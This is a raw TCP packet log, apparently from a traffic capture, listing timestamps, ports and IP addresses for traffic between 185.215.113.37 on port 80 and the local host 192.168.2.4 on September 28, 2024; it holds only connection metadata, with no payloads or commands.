Sep 28, 2024 07:32:13.509166956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509177923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509193897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509211063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509397984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509407997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509417057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509427071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509437084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509444952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509480000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509502888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509514093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509524107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509536028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509541988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509546041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509557962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509562969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509565115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509571075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509579897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509586096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.509603977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.509637117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510126114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510134935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510149956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510160923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510169983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510180950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510190964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510201931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510205984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510211945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510214090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510214090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510221004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510231972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510241985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510245085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510251999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510252953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510263920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510271072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510274887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510286093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510293961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510297060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510308027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510315895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510322094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510332108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510339022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510343075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510351896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510390043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.510952950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510965109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510973930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510983944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.510993004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511002064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511008024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511018038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511018991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511029959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511042118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511044025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511054993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511064053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511082888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511106968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511293888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511305094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511316061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511326075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511336088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511346102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511346102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511358023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511369944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511372089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511403084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511426926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511600018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511610031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511643887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511646986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511652946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511660099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511671066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511682034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511687994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511693001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511702061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511717081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511744022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511940956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511951923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511960983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511970043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511980057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.511991024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.511995077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512006044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512013912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512020111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.512025118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512034893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512041092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.512044907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512054920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512062073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.512065887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512078047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512080908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.512089014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512105942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.512106895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.512121916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.512152910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595235109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595258951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595267057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595331907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595340967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595343113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595356941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595371008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595407963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595446110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595458031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595488071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595489979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595500946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595513105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595535040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595609903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595622063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595633030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595643997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595654964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595663071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595674038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595695019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595849037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595865965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595876932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595890999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595901966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595902920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595913887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.595927954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595940113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.595973015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596064091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596075058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596086025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596096992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596115112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596139908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596205950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596220970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596231937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596242905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596251011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596255064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596271992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596297026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596458912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596471071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596482038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596492052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596502066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596503019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596513033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596514940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596524954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596545935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596560001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596570969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596570969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596584082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596595049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596604109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596606970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596616983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596626043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596628904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596642017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596652985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.596659899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596676111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.596694946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597151041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597166061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597176075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597187042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597198963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597198963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597210884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597220898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597223043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597235918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597251892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597269058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597290993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597479105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597490072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597500086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597511053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597522020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597524881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597532988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597544909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597553968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597557068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597569942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597584963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597585917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597585917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597596884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597606897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597613096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597619057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597630024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597637892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597640991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597651958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597651958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597665071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597666979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597676039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597687960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597697020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597698927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597712040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597722054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.597723961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597735882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.597765923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.598495007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598507881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598515987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598526001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598536015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598545074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598548889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.598556995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598567009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598577023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.598577023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598587036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598598003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598608971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598612070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.598619938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598629951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598632097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.598642111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598653078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598659039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.598663092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598675013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.598689079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.598709106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599004030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599015951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599025011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599035025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599046946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599055052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599064112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599065065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599076033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599086046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599087954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599097967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599107027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599116087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599123955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599134922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599143028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599144936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599157095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599163055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599169970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599186897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599211931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599540949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599586964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599601984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599612951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599641085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599652052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599657059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599678993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599797964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599809885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599819899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.599854946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.599868059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.600394964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600410938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600445986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.600457907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.600527048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600570917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.600609064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600620985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600657940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.600672007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.600682974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600693941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600703955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.600727081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.600739002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.682976007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683000088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683011055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683054924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683073044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683140993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683151007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683161020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683171034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683195114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683223963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.683260918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683271885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683281898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.683286905 CEST	80	49730	185.215.113.37	192.168.2.4
